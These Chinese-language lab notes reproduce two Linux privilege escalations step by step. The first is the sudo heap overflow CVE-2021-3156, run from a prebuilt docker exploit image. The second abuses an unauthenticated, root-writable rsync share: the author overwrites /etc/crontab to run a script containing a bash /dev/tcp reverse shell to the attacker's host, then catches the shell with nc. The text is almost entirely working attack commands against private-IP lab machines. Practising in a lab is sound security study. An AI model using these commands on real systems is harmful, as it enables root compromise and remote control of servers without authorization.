一、SUDO(CVE-2021-3156复现
判断漏洞存在:
1.版本
sudo: 1.8.2 - 1.8.31p2
sudo: 1.9.0 - 1.9.5p1
2.报错存在次漏洞
sudoedit -s /
不是报错信息:
复现:
环境:docker的centos7
需要新建一个用户
docker pull chenaotian/cve-2021-3156
docker run -d -ti --rm -h sudodebug --name sudodebug --cap-add=SYS_PTRACE chenaotian/cve-2021-3156:latest /bin/bash
docker exec -it sudodebug /bin/bash
cd ~
ls
cd /exp
su test
./exp
id
提权成功:
二、rsync未授权访问提权
rsync是linux下一款数据备份工具,默认开启873端口
不需要账号密码就可以登录,创建一个反弹shell的文件覆盖定时任务的默认文件或者直接创建定时任务进行覆盖反弹
环境可以使用docker的vulhub,网不好,一直没下载成功
复现环境:自己搭建的rsync centos7
复现:
搭建环境,挂在好镜像,直接安装
yum install -y rsync
修改配置文件rsyncd.conf
位置:/etc/rsyncd.conf
写入以下内容
uid = root
gid = root
use chroot = no
max connections = 4
syslog facility = local5
pid file = /var/run/rsyncd.pid
log file = /var/log/rsyncd.log
[src]
path = /
comment = src path
read only = no
启动环境:
rsync --daemon --config=/etc/rsyncd.conf
kali访问:
rsync rysnc://192.168.85.128:873
下面的内容是共享的文件夹
加上文件夹可看到次文件夹包含的其他目录,可以看出这是根目录
rsync rysnc://192.168.85.128:873/src
下载定时任务的文件,查看内容,发现没内容
rsync -av rsync://192.168.85.128:873/src/etc/crontab ./crontab
cat crontab
修改定时任务,加入以下命令
vim crontab
#写入
* * * * * root /11.sh
把反弹shell的命令写入11.sh,给与执行权限
vim 11.sh
#写入
#!/bin/bash
bash -i >& /dev/tcp/192.168.85.129/3344 0>&1
#加执行权限
chmod u+x 11.sh
覆盖上传定时任务文件,上传11.sh
rsync -av crontab rsync://192.168.85.128:873/src/etc/crontab
rsync -av 11.sh rsync://192.168.85.128:873/src/11.sh
监听端口
nc -lnvp 3344
成功提权